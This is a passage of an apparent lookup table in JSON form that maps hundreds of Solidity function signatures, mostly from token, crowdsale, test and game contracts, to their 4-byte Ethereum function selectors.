"ManageAccount()": "0xc179520c", "endDateStart()": "0xb8851fea", "lotteryTitle()": "0x984ac378", "endDateClose()": "0x5c3f9765", "tickets(uint256)": "0x50b44712", "ticketPrice()": "0x1209b1f6", "confirmTransaction(uint256)": "0xc01a8c84", "cancelBid(address,bytes32)": "0x2525f5c1", "ciberLottery()": "0xfd7c460d", "startLottery(bytes32,uint256,uint256,uint256,uint256,bool)": "0xd366fbab", "lotteryState()": "0x6939864b", "random()": "0x5ec01e4d", "buyIn()": "0x53aab434", "endLottery()": "0x1593a8c7", "lockedUntilBlock()": "0xd8162db7", "isLocked()": "0xa4e2d634", "replaceOwner(address)": "0xa39a45b7", "setBlockLock(uint256)": "0x366a68dc", "spentAllowance(address,address)": "0xdc3080f2", "frozenAccount(address)": "0xb414d4b6", "symbol()": "0x95d89b41", "processDeposit()": "0x8f70bfa0", "GNT()": "0x8c546f81", "createPersonalDepositAddress()": "0x89d59ee5", "standard()": "0x5a3b7e42", "getPersonalDepositAddress(address)": "0x40275f85", "decimals()": "0x313ce567", "name()": "0x06fdde03", "Deed(uint256)": "0xf4dc2d21", "Registrar(address,bytes32,uint256)": "0x60116397", "cancelOrder(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x278b8c0e", "amountFilled(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32)": "0x46be96c3", "tradeBalances(address,uint256,address,uint256,address,uint256)": "0x05888fcd", "order(address,uint256,address,uint256,uint256,uint256)": "0x0b927666", "changeFeeRebate(uint256)": "0x5e1d7ae4", "changeFeeTake(uint256)": "0x8823a9c0", "changeFeeMake(uint256)": "0x54d03b5c", "changeFeeAccount(address)": "0x71ffcb16", "changeAccountLevelsAddr(address)": "0xe8f6bc2e", "changeAdmin(address)": "0x8f283970", "EtherDelta(address,address,address,uint256,uint256,uint256)": "0x4c7f74df", "setAccountLevel(address,uint256)": "0x8abadb6b", "accountLevel(address)": "0x1cbd0519", "ReserveToken()": "0xe21608be", "assert(bool)": "0x0674763c", "game(uint256)": "0xcddbe729", "get_return_by_level(uint256)": "0xb964608d", "__callback(bytes32,string,bool)": "0x996a8046", "ownerDeposit()": "0x7b1aa45f", "ownerWithdrawl()": "0x69347990", "results(bytes32)": "0x4c6b25b1", "tokenLaunched()": "0xde78e78a", "calcStopPrice()": "0xdd9dd688", "calcCurrentTokenPrice()": "0xd9f8a4e2", "CEILING()": "0xc51bf934", "stage()": "0xc040e6b8", "testBaseToken()": "0xef3a6031", "getToken(bytes)": "0x7fe1dc7e", "getController()": "0x3018205f", "eventCallback(uint8,address,address,uint256)": "0x1334a5e2", "testDepositWithdraw()": "0xe23941bc", "testSystem()": "0xb17b94c1", "cleanUp()": "0xf6c5c80d", "deploy(address,uint256)": "0x4956eaf0", "getDBs()": "0xc971442c", "getFrontend()": "0x003074ff", "approve(address,address,uint256)": "0xe1f21c67", "transferFrom(address,address,address,uint256)": "0x15dacbea", "transfer(address,address,uint256)": "0xbeabacc8", "DSTokenBase(uint256)": "0x22017c5f", "testFallbackStaticSig()": "0x189c94ae", "testGetSig()": "0x60b431a4", "testCheckSigs()": "0xd57a12f5", "get_my_sig()": "0x6b1feeeb", "poke()": "0x18178358", "assets(bytes)": "0xe0ad411d", "internal_tester(int256)": "0xe2f8feb2", "dyn_sig()": "0x828d671c", "testOverflow()": "0x8040cac4", "helper(uint256)": "0xdabf7ec4", "try_to_get()": "0xb09bc3bf", "testReality()": "0xf06186c7", "testHypothesis()": "0x1b00fe51", "transfer(address,uint256,bytes)": "0xbe45fd62", "testFallbackReturn()": "0x44602a7d", "check_depth(uint16)": "0x246c02e6", "testEasyPropose()": "0x11d12402", "testSetup()": "0xbca86986", "doSomething(uint256)": "0xa6b206bf", "trigger(uint256)": "0xed684cc6", "confirm(uint256)": "0xba0179b5", "propose(address,bytes,uint256,uint256)": "0x268bb78e", "easyPropose(address,uint256,uint256)": "0xff1b4341", "getActionStatus(uint256)": "0xf6d5959b", "isMember(address)": "0xa230c524", "addMember(address)": "0xca6d56dc", "DSEasyMultisig(uint256,uint256,uint256)": "0xb06eb03f", "testCreateCostMain()": "0x5b067cce", "testCreateCostAuth()": "0x7c05caf3", "testCreateCostMultisig()": "0x4e6ba0a9", "testCreateCostToken()": "0x386fcda8", "testCreateCostData()": "0x9e2262f5", "buildFactory()": "0x3647b87a", "buildDSEasyMultisig(uint256,uint256,uint256)": "0x2bed55b0", "buildDSMap()": "0x089e0ad0", "buildDSApprovalDB()": "0xacf4280c", "buildDSBalanceDB()": "0x7d4cf602", "buildDSBasicAuthority()": "0x73e1743a", "set(bytes,bytes)": "0xa18c751e", "get(bytes)": "0xd6d7d525", "testAdminTransfer()": "0x1bf20668", "testAddBalanceFailsAboveOverflow()": "0xce220ecf", "testSubBalanceFailsBelowZero()": "0x65f27bea", "testSubBalance()": "0x6dbe31eb", "testAddBalance()": "0x8b95ec0c", "testSetGet()": "0xf639365d", "get(address,address)": "0xd81e8423", "set(address,address,uint256)": "0x19f02ceb", "testNormalWhitelistAdd()": "0xb870ecbb", "testExportAuthorized()": "0xc37e8cb2", "setCanCall(address,address,bytes,bool)": "0xed62cf1f", "updateAuthority(address)": "0x3c716e08", "isAuthorized(address)": "0xfe9fbb80", "updateAuthority(address,bool)": "0x6cd22eaf", "getAuthority()": "0xe2b178a0", "isAuthorized()": "0x57e6c2f4", "DSAuthorized()": "0xe6d95eb8", "canCall(address,address,bytes)": "0xf0f967e8", "testTransferToNullAuthority()": "0x2b1071c9", "testTransferToRejectAuthority()": "0xe17e1274", "testTransferToAcceptAuthority()": "0xb4c4e005", "testNonOwnerCantBreach()": "0x94a1710d", "testOwnerCanBreach()": "0x04a2b2c2", "look()": "0x6c050eae", "breach()": "0x0b6142fc", "Vault()": "0x2d2c44f2", "testProxyCall()": "0xdcfa9cc0", "compareLastCalldata(bytes)": "0x1b437d0c", "execute(address,bytes,uint256,uint256)": "0xf3541901", "exec(address,bytes,uint256,uint256)": "0x773c84ee", "example2Func()": "0xa677fbd9", "Example2()": "0x94bcdb4c", "testFailure()": "0xe44d3084", "testLogs()": "0x3c67c51e", "exampleFunction(uint256)": "0x934bc29d", "Example(uint256)": "0xdbecc372", "test3Fails()": "0xfdc193a4", "test2Fails()": "0x88a1e895", "test1Fails()": "0x8bbb5af7", "testEvent()": "0x4f9d719e", "noevent()": "0x0db73c72", "throwFooBar()": "0x7fcf3a2f", "throwFoo()": "0xfac34ff6", "testThrowSomething()": "0xc813c30e", "testFail()": "0x04d91c6a", "testPass()": "0xd38159b8", "unitDefense(uint256)": "0x21446cfe", "unitAttack(uint256)": "0x69632f56", "battleCardIdRange()": "0xcf0f864e", "productionCardIdRange()": "0x625785bb", "getUnitJadeStealingMultiplier(address,address,uint256)": "0x2ee01240", "getUnitJadeStealingIncreases(address,address,uint256)": "0x47f4034a", "getUnitDefenseMultiplier(address,address,uint256)": "0xde5b9987", "getUnitDefenseIncreases(address,address,uint256)": "0xc498fcfd", "getUnitAttackMultiplier(address,address,uint256)": "0x93fb28bd", "getUnitAttackIncreases(address,address,uint256)": "0xd89b465c", "EcoToken()": "0xaae4cbe4", "add256(uint256,uint256)": "0xe0c5f3a0", "sub256(uint256,uint256)": "0xb37c7dc0", "div256(uint256,uint256)": "0xfc5a0152", "mul256(uint256,uint256)": "0x26bceb59", "updateTokenPrice(uint256)": "0x676c0d77", "setFundingEnabled(bool)": "0xc2b4ddde", "setVaultAddress(address)": "0x85535cc5", "NobarToken(uint256,string,string)": "0x5629e70b", "LuckyMoneyToken(uint256,string,uint8,string)": "0x3da216da", "isRunning()": "0x2014e5d1", "tokenEmission(uint256,uint256)": "0xdeb775a7", "CatICO(address)": "0xfaafa08f", "startCrowdsale()": "0xa39953b2", "withdrawFunder(address)": "0xe91cc17c", "checkRefund(address)": "0x738e6d78", "checkKYC(address)": "0x8846594b", "getSoftcapReached()": "0x5deeffb2", "getRemainingSellingToken()": "0x8dd4f292", "getRemainingSellingTime()": "0xb89e8cbb", "getRemainingMineSupply()": "0x17c201a1", "getContractBalanceOf()": "0xbf487801", "withdrawContractToken(uint256)": "0x9ef7e723", "mining(address,uint256)": "0xc4dcad1d", "AcreToken(address,address)": "0x61235639", "TokenERC20(string,string,uint8,uint256)": "0xae799f4a", "isLockup(address)": "0xfefa7d1c", "lockup(address)": "0x0df19d35", "getEmptyIndex()": "0x31b77da4", "isEmptyOwner()": "0x120cc993", "getOwnerIndex(address)": "0x25174f0e", "isExistedOwner(address)": "0x0419c814", "isManageable(address)": "0x718e6c44", "revokeOwners(address)": "0xbf88fc09", "grantOwners(address)": "0x25ba0824", "cancelOwnership()": "0x4e2808da", "reserveOwnership(address)": "0x8bec5b31", "getMinutes(uint256)": "0x4ba4d784", "getHours(uint256)": "0x7877f72d", "getDays(uint256)": "0xf22a0b31", "issueToken(uint256,uint256,uint256)": "0xd1ca0218", "balanceFromToken(uint256)": "0xc3787865", "freeOf(uint256)": "0x47471183", "parentOf(uint256)": "0xcfa3c132", "creatorOf(uint256)": "0x589a1743", "withdrawAmountFromToken(uint256,uint256)": "0x5f30ed2a", "withdrawAllFromToken(uint256)": "0x90431b6e", "setCreator(address,uint256)": "0xc8cb8a75", "SmartSignature()": "0xbab9c00c", "Marcellocoin()": "0x45dafed2", "disableAddress(address)": "0x5036258b", "enableAddress(address)": "0x9eefdd87", "disableRegulator(address)": "0xd48f08e5", "enableRegulator(address,string)": "0x87615cb2", "whitelisted(address)": "0xd936547e", "changeList(address,bool)": "0xefbd9ec2", "AddressList(string,bool)": "0xb7d89483", "PAYA()": "0x5498eae4", "mintTimelocked(address,uint256,uint256)": "0xc14a3b8c", "finishPayaning()": "0x35c914c2", "setaddress(address)": "0x14029756", "getDsitributeMulti(address[],uint256[])": "0xe437d815", "getDsitribute(address,uint256)": "0xc536c952", "GGG()": "0xe599a767", "PGE01NY()": "0xc4cfc5be", "_checkPixelUnderRight(uint256)": "0x5ca20102", "_checkPixelAboveRight(uint256)": "0x67f06f78", "_checkPixelUnderLeft(uint256)": "0x58f65330", "_checkPixelAboveLeft(uint256)": "0x7b969dcd", "_checkPixelLeft(uint256)": "0xd357f0ce", "_checkPixelRight(uint256)": "0x136512c9", "_checkPixelUnder(uint256)": "0x369bcd64", "_checkPixelAbove(uint256)": "0x14c01fb4", "_createPixel(uint32,uint8,uint8,uint8,string)": "0xb7b1b93f", "isInvulnerableByArea(uint256)": "0x782addbd", "_changeText(uint256,string)": "0xd2accad3", "_changeColour(uint256,uint8,uint8,uint8)": "0x3e313f28", "multiPurchase(uint32[],uint8[],uint8[],uint8[],string)": "0xbff7e179", "promoPurchase(uint32,uint8,uint8,uint8,string)": "0x06e5fe85", "getPixelColour(uint256)": "0x642fd0f6", "getOwnerPixelCount(address)": "0xca04e076", "getPixelsOwned(address)": "0x5fa382ea", "getPixelPrice(uint256)": "0xc456d394", "getPixelText(uint256)": "0xd6224a6b", "getPixelData(uint256)": "0x5840b0f8", "updateAllPixelDetails(uint256,uint8,uint8,uint8,uint256,string)": "0x8660bb8b", "assignCEO(address)": "0x0ff2e4b2", "bytesToUint(bytes)": "0x02d06d05", "NeoWorldCash()": "0x915b5bfc", "ICOZ()": "0xbbad6172", "totalVotes()": "0x0d15fd77", "executeAmendmentMandate(uint256)": "0x45acc490", "callAmendment(uint256)": "0x830e8e64", "voteAmendment(uint256)": "0xd7c8e90c", "newAmendment(string,uint256,uint256)": "0x69269371", "transferVotes(address,uint256)": "0x6645c0dc", "vote(uint256,bool,uint256)": "0xd46a5d7e", "addIssue(string)": "0x58d8652e", "unionBalance()": "0x519903f1", "setJoiningFee(uint256)": "0x1ac589b4", "renewMembership()": "0x0933b939", "applyMember()": "0xdfbc3de1", "executeElectionMandate(uint256)": "0x80fa860f", "callElection(uint256)": "0x69edd4fe", "voteElection(uint256)": "0xfdf56d57", "addElection(address,uint256)": "0x6d72da47", "reviewActiveMembers(uint256,uint256)": "0x8b7116e4", "getMemberCount()": "0x997072f7", "spendFunds(address,uint256,string)": "0x4fd88a1c", "Uniond()": "0xcb562fb3", "boolMemoryArray(bool)": "0xfaa3981a", "bytesMemoryArray(bytes)": "0x0da24421", "intMemoryArray(int256)": "0x45bd3752", "addressCallWithArray(address,address[3])": "0x68e12fa8", "boolCallWithArray(bool,bool[4])": "0x94ec233f", "bytesCallWithArray(bytes,bytes32[4])": "0x5df8d74e", "intCallWithArray(int256,uint8[4])": "0xf6731d62", "drain(address,uint256)": "0xb184be81", "deposit(bytes32)": "0xb214faa5", "nominate(address,address)": "0x5049f497", "recoverFailedLock()": "0xf85b2160", "setInvestor(address,uint256)": "0x8e327dd3", "setStateDistributing()": "0xbba4a876", "setStateHolding()": "0x9c830beb", "setStateLoading()": "0x53290b3a", "burn(uint128)": "0x90bc1693", "mint(int256,uint128)": "0xadc042bf", "pull(address,uint128)": "0x8402181f", "push(address,uint128)": "0x3452f51d", "DSToken(bytes32)": "0x2f0573d9", "HasNoEtherTest()": "0x5f95ad43", "test3_searchNext()": "0xa7c98748", "test2_addingSecond()": "0x8adde811", "test1_addingFirst()": "0x8ef5ce28", "test0_create()": "0x88b7a89d", "getOrModifyBlocked(address)": "0xec041a24", "setEligibleForReimburse(bool)": "0xdea3ce27", "GetParticipant(address,address)": "0x245a367c", "SetParticipantAgrHash(address,address,bytes32)": "0xce435f4b", "SetParticipantURI(address,address,string)": "0xfe1c5aac", "SetParticipantURL(address,address,string)": "0xdea0a837", "SetParticipantRole(address,address,uint8)": "0x493a64e4", "SetParticipantName(address,address,string)": "0xad26f6e1", "GetParticipantRole(address,address)": "0xa0b2995a", "RemoveParticipant(address,address)": "0x15506bf1", "AddParticipant(address,address,string,uint8,string,string,bytes32)": "0x94aa8174", "SetIDChain(address,address)": "0x4aea7aa9", "Parties()": "0x0fd0aa67", "getTokensLeft()": "0xde5f9866", "getWeight()": "0xa9b4b780", "canSend()": "0x7903d8c8", "isRed()": "0x71489835", "isYellow()": "0xfd9f12b0", "hasFees()": "0x65103f6e", "getWeightMinusFees()": "0x6b790be4", "getStorageRate()": "0x49b76501", "getLastStoragePayDate()": "0xc197a7b1", "getCalculatedFees()": "0xb7870845", "Gold(address,uint256)": "0x49dd2880", "_getEnd(int256)": "0xd5fbe080", "_getBegin(int256)": "0x1e4bffde", "_getEndIndexKey(uint256)": "0x5336cd16", "_getBeginIndexKey(uint256)": "0x193fc711", "createNew(uint256)": "0x0e6ce30d", "createNew()": "0xa4331929", "MultiOwnable(address)": "0xeac2f8d9", "hasOpenApplication(address)": "0xa81a3e4d", "hasOpenApplicationFromSource(address,address)": "0x8a7c2d6d", "withdrawApplication(address)": "0x8f08e369", "submitApplication(address)": "0x2611341b", "addApprover(address,string)": "0x94ffb819", "SingleApproval()": "0xa17d4228", "hasProof(bytes32)": "0xe3d1e6d6", "checkDocument(string)": "0x53fb9233", "storeProof(bytes32)": "0x8952877b", "paySomeone(address,address)": "0x8e8a3983", "transferSecurityDeposit(address,address)": "0x08e8000c", "receiveSecurityDeposit(address)": "0xed561fe5", "burnSomeEther()": "0xe46fbe76", "FundsRegistryTestHelper(address[],uint256,address)": "0xcc9d858d", "newUpload(bytes32,string,uint16,bytes32)": "0xa2d4db9c", "getUpCount()": "0x37daa09e", "getFileLoc(uint256)": "0x5a236389", "getDate(uint256)": "0x2b57298b", "getLocation(uint256)": "0x7f7b1393", "getHash(uint256)": "0x6b2fafa9", "AnonReport(uint256)": "0x4921f9e9", "recover(bytes32,bytes)": "0x19045a25", "Validate(string,string,string,bool)": "0x250a1c1d", "requestNewEtherRealID(string,string,string)": "0x33989396", "counter_in()": "0x6d4fe435", "Withdrew()": "0x26109699", "totalCLNcustodian()": "0x4c4efef7", "home()": "0x9fa92f9d", "largeCount()": "0x98337afb", "InvestorSum()": "0x8a1bba96", "farmer()": "0xd811fcf0", "getPreSaleEnd()": "0x4df498b2", "num_tokens_auctioned()": "0x03cc7b85", "allocateStartBlock()": "0xe11a5a4f", "maxWeiTier1()": "0x9aae3d0e", "tradeRobot()": "0x89fa413d", "companyReserve()": "0xd5b5dc49", "hasInitCard2()": "0xe54919e6", "ICONIQ_TOKENS_NEEDED_PER_INVESTED_WEI()": "0xed782750", "ACL_APP_ID()": "0xcbcc65eb", "director()": "0x5af82abf", "startPreICOnow()": "0xf5685061", "MAX_HOLDERS()": "0x22e12720", "receivedCount()": "0xba9d0638", "BTCS_PORTION_MAX()": "0xd6f4472d", "m_D_n()": "0xcb7c30f2", "rootOfTrust()": "0x43160e3d", "Cost()": "0xf63c533c", "defaultPrice()": "0xe69e04b3", "ODD()": "0x082a7e60", "devAllocation()": "0x4c20179e", "maxDestroyThreshold()": "0x73b3dcde", "sponsoredJackpotMax()": "0xb1e045f7", "allocateEndTime()": "0xc750c3b1", "CROWDSALE_ETH_IN_WEI_FUND_MIN()": "0x9bd4e925", "MAX_PERSIANS()": "0xbe48acc4", "PROMETHEUS_PRICE_THRESHOLD()": "0x1beafada", "maximumFunding()": "0x99d64ab0", "secondStage()": "0x73dd9073", "STARTING_FALCON()": "0xfbb58c5c", "phase_3_Time()": "0x92b4ddeb", "requiredSharesToBeBoardMember()": "0xb94fa03f", "adventureHandler()": "0xb239e2f1", "syndicatePrecision()": "0x4da5598a", "numberOfAddress()": "0x34686b73", "shopShoes()": "0x584855f0", "enjinTeamAddress()": "0xdb08ccec", "saosao5()": "0xcd20b24b", "LOOMIA2_ADDR()": "0x3b1ede9a", "oldXPAAssets()": "0x1390df6c", "hasThreeStepWithdraw()": "0xdc7bbd72", "affiliatePercent()": "0xf4239eec", "headerColor()": "0x31921cad", "minSumPreICOUSD()": "0xc40b4c4d", "remaindersSet()": "0x98a9ae44", "CROWDSALE_PHASE_3_START()": "0xd999b17e", "volumeType6()": "0xebabfb0b", "totalClass()": "0x84ba745e", "ALLOC_SC()": "0x481f9555", "sale_state()": "0xf5e1713e", "lendingInterestRatePercentage()": "0x41c8b1de", "inception()": "0x80f4432a", "icoAmountBonus3()": "0xa06ef4f2", "crowdsaleTokenSold()": "0x19af6f48", "industry()": "0x08aa62c4", "CROWDSALE_ALLOWANCE()": "0x5c9d0fb1", "mintingDone()": "0x8e2ae564", "productId()": "0xc5ce3911", "gameEndTime()": "0x44d9bc5f", "maxEthPerAddress()": "0x529ae0bf", "RATE_CROWDSALE_S1()": "0x46d5688e", "fundingRatePredictionBonusPoolInIBC()": "0xc825a939", "optionTotalSupply()": "0x8db974e4", "FundsWallet()": "0x11c99f3b", "bigAmount()": "0x1ace4d05", "newLottery()": "0xb1e2cb03", "amountToSend()": "0xae277584", "numLocks()": "0xd422cf58", "ETH_USD()": "0x6260f55b", "SUPPLY_FOR_RESERVE()": "0xf17382ae", "isFightClockAuction()": "0x443e1cf7", "CREATED_PROMO()": "0xb4c16ea5", "getSaleEnd()": "0x4cc22f9d", "swap_able()": "0x90ae144e", "total_racers()": "0x83a18678", "DELIVERED_FEE_FLAG()": "0x39c2697c", "unlimited()": "0xcb457d47", "ICO_TOKENS_AMOUNT()": "0xba2ee51f", "isSalesManager()": "0x6cfdc242", "priceOracle()": "0x2630c12f", "bonusLine()": "0x36d647cf", "modifyTokenFee()": "0x36cc6a10", "maxPresaleEDUSupply()": "0x1c545049", "OperationsFund()": "0x2a8e391d", "LOCKING_UNLOCK_TIME()": "0xe6c4498b", "TestRandomNumber()": "0x455530a6", "salesaccount()": "0x57bbf921", "currentCapEther()": "0x3a62cd2e", "foundersTimelock1()": "0xc0489af5", "initialSupplyPerChildAddress()": "0x6f82e068", "directorLockDays()": "0x626e4675", "canCashBack()": "0x06525841", "tokenSaleAddr()": "0xaa54ad35", "lastDivideRewardTime()": "0x2beaead0", "DTRC()": "0x842a6415", "refineCost()": "0xa8a5c22c", "getGoalsCount()": "0xd0d511f9", "FULL_TOKEN_WALLET()": "0x696df08e", "addMoneyToContract()": "0x1834ef4e", "presaleConversionRate()": "0x514b13f2", "tokenMaturityPeriod()": "0xc8a45c44", "bryan()": "0x35c72df0", "nextScheduledQuery()": "0x5fcc7ea1", "takeBountyTokens()": "0x1b27c8f2", "crowdSaleIsOver()": "0x2cae0c76", "t2tokenExchangeRate()": "0x2b8a1c00", "_bonusTime2()": "0xdba989ca", "preTGE()": "0x1b1f2fb8", "players()": "0xdc0b3564", "withdrawalPeriod()": "0xbca7093d", "PRE_MAX_CAP()": "0x0577f62f", "ICOStartTime()": "0x03652c4e", "bountyTokensReserve()": "0x8c37e152", "blockedTimeForBountyTokens()": "0xfd874a7b", "EtherUSDPriceFactor()": "0xc1374d5a", "weiRaisedInPreICO()": "0x117ddaf9", "tkn()": "0x05f3a852", "_getCurrentRoundTeamCos()": "0x0fe961da", "devPayed()": "0xa03189b3", "fundForBounty()": "0x563baca1", "maxMedalsBurned()": "0xc031a78b", "limitDatePresale()": "0x76278e7b", "SPECIALIST_STAKE_ONE()": "0x7c4f8958", "hitPrice()": "0x5809ea99", "bonusShare()": "0x835e98d7", "networkGrowthAmount()": "0x2b4a964b", "C20Token()": "0x58c56f1e", "saleRateSecondDay()": "0x35ad9581", "bonusBasePoints()": "0x7424bebc", "destTokensBounties()": "0x309e078a", "mintingBountyFinish()": "0x8f4708bd", "totalWithdrawTokenAll()": "0x2583b2e4", "closePreICOPrivate()": "0xd7901260", "ownerProfit()": "0xd28442ef", "adminMultiSig()": "0x45c6a874", "SalePaused()": "0x8a98cbd0", "confirmPlatformWithdrawal()": "0x20701967", "Dev_TokenReleased()": "0x5db6687b", "tokensSoldInPresale()": "0x5e91c37d", "employeeDenyExerciseOptions()": "0x6201124f", "marketingReserve()": "0x3e85713d", "round_()": "0x37c30a98", "isNeedLoan()": "0x9ebc8c95", "TOKEN_CLAIM_WAIT_PERIOD()": "0x4254704f", "REAPER_INTREPID_EXTRACTION_BASE()": "0xa3358ae4", "owner_supplied_eth()": "0x6954abee", "delivered()": "0xbbdfbfba", "_config()": "0x2ed42bf7", "pauseBlockNumber()": "0xc264786f", "maxAmountPresale()": "0xb946fab1", "endpresale()": "0x1fd8291a", "maxDeposit()": "0x6083e59a", "defaultMax()": "0xa317abc7", "fourthWeek()": "0x0cb1d6b4", "godBank()": "0x11613fc9", "FOUNDER_ADDRESS2()": "0x4995e9fb", "additionPrice()": "0x69f80c7a", "retrieveCurrentTokensToOwner()": "0x39a7cb16", "donationWallet()": "0xe7b94df4", "stage2BeginTime()": "0xc6eb8a65", "badgeDecimals()": "0x87b8963c", "custodyStorage()": "0x1baf7122", "height()": "0x0ef26743", "LockInExpiry()": "0xde090b25", "teamReserveWallet()": "0x9f83008a", "giveEthBankrollAddress()": "0x1b5a8da6", "QLinkToken()": "0x32948515", "sit()": "0xa7944579", "rankNumbers_()": "0x3ceb7783", "m_numMembers()": "0x300abd61", "thirdPeriodOfICO()": "0xe5390e05", "adminWallet()": "0x36b19cd7", "employeeShare()": "0x8b290a72", "prospectors_team()": "0x73743fbe", "fundingReserve()": "0xe8c66cac", "priceRandomFight2Death()": "0xb373a61c", "tokensFinalized()": "0x13040bc1", "getTotalVesting()": "0xe9afad38", "receiverAddr()": "0xa3dcb4d2", "authorizerTwo()": "0x169d16f4", "wolf4Balance()": "0x21db06bc", "icoPeriodTime()": "0x00918c7b", "timeOfLastHalving()": "0xc11bd455", "novumAddress()": "0xc35c3265", "icoEndtime()": "0xd211fe86", "HATCHBACK()": "0x11e847b6", "bonusInPhase6()": "0x09c72b26", "FOUNDER_ADDRESS3()": "0xe59cf926", "platformFundingSupply()": "0x0c2c81ed", "sumPreICOUSD()": "0xcad6dd1f", "m_fundsAddress()": "0x827ef4c7", "QSTPerEth()": "0x5f49d562", "totalSupplyMintTransfer()": "0xd33d6732", "maxAgonCount()": "0x28b6c658", "getinitializeFeeWindowIdValue()": "0x680f07b4", "getInitializeUniverseValue()": "0xb4e92f20", "setIncreaseTotalWinningStake(bool)": "0xdf979b92", "getIncreaseTotalStakeCalled()": "0xc5e42338", "setIsContainerForFeeWindow(bool)": "0x6cc23437", "setIsActive(bool)": "0x2750fc78", "setIsReportingActive(bool)": "0x354836b9", "setIsOver(bool)": "0x4886d2d5", "setIsDisputeActive(bool)": "0x9a72afb6", "setIsForkingMarketFinalized(bool)": "0x13c82b0b", "setIsContainerForMarket(bool)": "0xe00bc0f4", "setMigrateFeesDueToFork(bool)": "0xe5258557", "setCollectFeeWindowReportingFees(uint256)": "0x2c5cb666", "setAllMarketsFinalized(bool)": "0xfb81299b", "setNumDesignatedReportNoShows(uint256)": "0x98646d68", "setAvgReportingGasPrice(uint256)": "0xff5b98b8", "setNumIncorrectDesignatedReportMarkets(uint256)": "0x0b377a8f", "setNumInvalidMarkets(uint256)": "0xc06f146b", "setNumMarkets(uint256)": "0x2d5949a0", "setEndTime(uint256)": "0xccb98ffc", "getNoteDesignatedReport()": "0x81aee4f4", "getUpdateMarketPhaseCalled()": "0xa1c14350", "setNoteReportingGasPrice(bool)": "0x08fcec89", "getRemoveMarketCalled()": "0x630db9ee", "getMigrateMarketInFromNiblingCalled()": "0x2780d22b", "getMigrateMarketInFromSiblingCalled()": "0x29ba8d03", "TrustToken()": "0x6885f63b", "scheduleUnderwriteOraclizeCall(uint256,bytes32)": "0x8b8c5ed9", "launch()": "0x01339c21", "betOdd()": "0xf4519035", "betEven()": "0xadde36bb", "betSingle(uint256)": "0x703bf91f", "getBetsCountAndValue()": "0xef37cfe9", "getNextRoundTimestamp()": "0xb633b2ab", "Roulette(uint256)": "0x62dc9ced", "test(uint256,uint256)": "0xeb8ac921", "loadX(uint8[],uint256,uint256,int256)": "0x760c1fa3", "load(uint8[],uint256,uint256,uint256,bool)": "0xc4457e47", "storeX(uint8[],uint256,uint256,uint256,int256)": "0x95722371", "store(uint8[],uint256,uint256,uint256,uint256)": "0x2d41bc9b", "typeSize(uint256)": "0xf04ed952", "fromMemory(uint8[])": "0x733122aa", "loadN(uint8[],uint256,uint256)": "0x0d0b0c74", "storeN(uint8[],uint256,uint256,uint256)": "0x8ae85b80", "toMemory(uint256,uint256)": "0x90232694", "payCreator()": "0xe00824bb", "payTokens()": "0x52019dc3", "payBack()": "0x019f64cc", "payMe()": "0xd997ccb3", "percentOfGoal()": "0xea7f537a", "checkTokTotal()": "0x95139780", "checkTokDev()": "0x639ec4d2", "checkTokSold()": "0x8d111ac6", "checkTokBalance(address)": "0x30a9ef5b", "checkSavedEthBalance(address)": "0x49ba5a48", "checkEthBalance(address)": "0x9a9a5cdb", "isSuccessful()": "0xec4cd0cf", "isComplete()": "0xb2fa1c9e", "isStarted()": "0x544736e6", "tokenBalance()": "0x9e1a4d19", "BattleDromeICO()": "0xfd3c4277", "_permitted()": "0xc836efcb", "removeContract(bytes32)": "0xa43e04d8", "addContract(bytes32,address)": "0x5188f996", "setPermissionsProvider(address)": "0xfa640427", "getPermissionsProvider()": "0x04186c57", "ProtectedApi(address)": "0x8aaa559a", "wcOnCrowdsaleFailure()": "0x001cf577", "wcOnCrowdsaleSuccess()": "0x34ef801e", "getTotalInvestmentsStored()": "0xb550e634", "storeInvestment(address,uint256)": "0xade7dd7b", "createAuthority()": "0x2a52ee60", "CreateShortAlias(bytes32)": "0xbf75fdb5", "SetAlias(uint256,bytes32)": "0x111e73ff", "Alias()": "0xe4065c4c", "emergencyExtract()": "0x5fa51277", "distributeTokens(address,uint256)": "0x158a4988", "removeWhitelisted()": "0xc5241e29", "addWhitelisted()": "0xa90e09e2", "setCrowdsaleAddress(address)": "0x1f35bc40", "Drops(uint256)": "0x70ef14de", "getByReferenceCode(bytes32)": "0x3b768433", "insert(bytes32,uint256,uint256,address,address)": "0x110d9e68", "exists(bytes32)": "0x38a699a4", "multisend(address,address[],uint256[])": "0xad8733ca", "createRandomZombie(string)": "0x7bff0a01", "_generateRandomDna(string)": "0xdf57a6ec", "_createZombie(string,uint256)": "0x20c3be47", "specificBatchCheck(uint256)": "0xaf093f9c", "checkAddressBatch(address[])": "0xa8d8e055", "AddressChecker()": "0x981012f2", "sellBNT(uint256)": "0x8d776457", "BNTPrice()": "0xf1533936", "BNTBalance()": "0xd0e9f00f", "TokenChangerBNT(address,address)": "0xdc6bc372", "setBonus(uint256)": "0x0b98f975", "buyTokens(address,uint256)": "0x0752881a", "PeculiumToken()": "0x14656957", "setFiscal(bytes32,uint256,uint256,uint256)": "0xdc415804", "setFiscalVerify(bytes32,uint256,uint256,uint256)": "0x608eaa6a", "claimMultiple(address,uint256)": "0x6bc3e4a8", "isPriorPack(address)": "0xbd6cac4f", "getCardCount()": "0x7d620130", "getPurchaseCount()": "0xbecd283f", "DigiPeso()": "0xd863f7f4", "setMintAgent(address,int256)": "0x05a0c707", "SaleToken(string,string,uint256)": "0xedc6454d", "CWT(uint256,string,string)": "0x4ac84242", "PVBToken()": "0x1e659135", "ioucoin()": "0x60b6ff5c", "YFT()": "0x28cffcd8", "Dancer()": "0x420a8b76", "EOSGold()": "0x843fcf90", "NatoExchangeToken()": "0xbf4d0abe", "BitcoinGame()": "0x9a4435c6", "EEZcoin(address)": "0x2340903d", "updateInitialZero(uint256)": "0x36330b0c", "amountBurned()": "0x5290d773", "FLTToken()": "0x027bb838", "TourCash(uint256,string,string)": "0x0a15299b", "distributeTCASH(address[])": "0x1b8de48c", "GanLiXia()": "0xc67f3ba3", "setNumOfTimesSteal(uint8)": "0x2630ef36", "initOraclize()": "0x1619fc14", "STCoin(uint256,string,string)": "0xa8372511", "setStaleTime(uint256)": "0x7d14c8df", "getPriceAndTime()": "0xe139e569", "getCurrencyDenominated()": "0xd2654219", "getCurrencySymbol()": "0x5dfc09a4", "getCurrencyAddress()": "0xbfe0c27e", "EVBChain()": "0xcb2b5668", "getCardAttrs(uint256[])": "0x3548fcd7", "getOwnCard(address)": "0xe1ee9284", 